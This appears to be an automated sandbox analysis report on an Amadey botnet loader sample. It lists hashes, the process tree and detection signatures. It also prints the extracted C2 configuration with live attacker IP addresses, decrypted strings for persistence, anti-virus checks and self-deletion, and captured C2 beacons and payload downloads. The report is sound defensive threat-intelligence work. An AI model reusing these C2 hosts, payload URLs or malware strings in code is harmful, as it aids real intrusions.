Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1651721
MD5:0b7487b0b78bd7587e0583b13b068f02
SHA1:c55a13d7b730ba5e51511979d11b04d11acf53ab
SHA256:dad41fe11699ffd7e23d5bf0c558966cf6156626752e4a517d0c955cbb7b5b60
Tags:092155Amadeyexeuser-aachum
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Downloads executable code via HTTP
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • random.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 0B7487B0B78BD7587E0583B13B068F02)
    • rapes.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 0B7487B0B78BD7587E0583B13B068F02)
  • rapes.exe (PID: 5300 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 0B7487B0B78BD7587E0583B13B068F02)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{
  "C2 url": "176.113.115.6/Ni9kiput/index.php",
  "Version": "5.21",
  "Install Folder": "bb556cff4a",
  "Install File": "rapes.exe"
}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    00000002.00000002.1297857996.0000000000BF1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      00000002.00000003.1257661877.00000000053E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        0000000A.00000003.1763027264.0000000004A30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          00000000.00000002.1268903433.0000000000631000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-29T14:27:07.948733+010020609691Malware Command and Control Activity Detected176.113.115.680192.168.2.649699TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-29T14:27:06.241251+010028561471A Network Trojan was detected192.168.2.649699176.113.115.680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-29T14:27:10.262134+010028033053Unknown Traffic192.168.2.649701176.113.115.780TCP
            2025-03-29T14:28:11.827478+010028033053Unknown Traffic192.168.2.649704176.113.115.780TCP

            Joe Sandbox Signatures

            • AV Detection
            • Compliance
            • Networking
            • System Summary
            • Data Obfuscation
            • Persistence and Installation Behavior
            • Boot Survival
            • Hooking and other Techniques for Hiding and Protection
            • Malware Analysis System Evasion
            • Anti Debugging
            • HIPS / PFW / Operating System Protection Evasion
            • Language, Device and Operating System Detection
            • Stealing of Sensitive Information
            • Remote Access Functionality

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: random.exeAvira: detected
            Source: http://176.113.115.7/files/newdef/apple.exeAvira URL Cloud: Label: malware
            Source: http://176.113.115.7/files/rast333a/random.exeAvira URL Cloud: Label: phishing
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeReversingLabs: Detection: 61%
            Source: random.exeVirustotal: Detection: 54%Perma Link
            Source: random.exeReversingLabs: Detection: 61%
            Source: Submited SampleNeural Call Log Analysis: 91.7%
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 176.113.115.6
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Ni9kiput/index.php
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: S-%lu-
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: bb556cff4a
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapes.exe
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Startup
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Programs
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: %USERPROFILE%
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: clip.dll
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: http://
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: https://
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: /quiet
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Plugins/
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: &unit=
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: shell32.dll
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: kernel32.dll
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProgramData\
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: AVAST Software
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Kaspersky Lab
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Panda Security
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Doctor Web
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 360TotalSecurity
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Bitdefender
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Norton
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Sophos
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Comodo
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: WinDefender
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0123456789
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: ------
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: ?scr=1
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: ComputerName
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: -unicode-
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: VideoID
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: ProductName
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: CurrentBuild
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32.exe
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: && Exit"
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: " && ren
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Powershell.exe
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: random
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000419
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000422
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 00000423
            Source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: 0000043f
            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49699 -> 176.113.115.6:80
            Source: Network trafficSuricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.6:49699
            Source: Malware configuration extractorIPs: 176.113.115.6
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 29 Mar 2025 13:27:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 29 Mar 2025 11:48:40 GMTETag: "210e00-63179c4aa28c5"Accept-Ranges: bytesContent-Length: 2166272Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 aa bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b4 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 38 13 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 72 68 72 68 79 78 7a 00 90 1a 00 00 20 31 00 00 86 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 6e 76 6f 6e 67 6c 00 10 00 00 00 b0 4b 00 00 04 00 00 00 e8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 ec 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YYY3pY[[YVXRichYPELdK@K8!@[o
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 29 Mar 2025 13:28:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Mar 2025 23:33:49 GMTETag: "51e6d-6314744ebb140"Accept-Ranges: bytesContent-Length: 335469Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 2e 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 06 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 cc 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cc 46 00 00 00 40 06 00 00 48 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 90 06 00 00 24 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b.00@@
            Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
            Source: global trafficHTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 176.113.115.7
            Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 65 32 3d 31 30 33 36 32 32 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e2=10362200101&unit=246122658369
            Source: global trafficHTTP traffic detected: GET /files/newdef/apple.exe HTTP/1.1Host: 176.113.115.7
            Source: global trafficHTTP traffic detected: GET /files/newdef/apple.exe HTTP/1.1Host: 176.113.115.7
            Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
            Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
            Source: Joe Sandbox ViewIP Address: 176.113.115.6 176.113.115.6
            Source: Joe Sandbox ViewIP Address: 176.113.115.6 176.113.115.6
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49701 -> 176.113.115.7:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49704 -> 176.113.115.7:80
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
            Source: global trafficHTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 176.113.115.7
            Source: global trafficHTTP traffic detected: GET /files/newdef/apple.exe HTTP/1.1Host: 176.113.115.7
            Source: global trafficHTTP traffic detected: GET /files/newdef/apple.exe HTTP/1.1Host: 176.113.115.7
            Source: unknownHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

            System Summary

            barindex
            Source: random.exeStatic PE information: section name:
            Source: random.exeStatic PE information: section name: .idata
            Source: random.exeStatic PE information: section name:
            Source: rapes.exe.0.drStatic PE information: section name:
            Source: rapes.exe.0.drStatic PE information: section name: .idata
            Source: rapes.exe.0.drStatic PE information: section name:
            Source: random[1].exe.10.drStatic PE information: section name:
            Source: random[1].exe.10.drStatic PE information: section name: .idata
            Source: random[1].exe.10.drStatic PE information: section name:
            Source: aae6fb6455.exe.10.drStatic PE information: section name:
            Source: aae6fb6455.exe.10.drStatic PE information: section name: .idata
            Source: aae6fb6455.exe.10.drStatic PE information: section name:
            Source: C:\Users\user\Desktop\random.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
            Source: random[1].exe.10.drStatic PE information: Data appended to the last section found
            Source: aae6fb6455.exe.10.drStatic PE information: Data appended to the last section found
            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
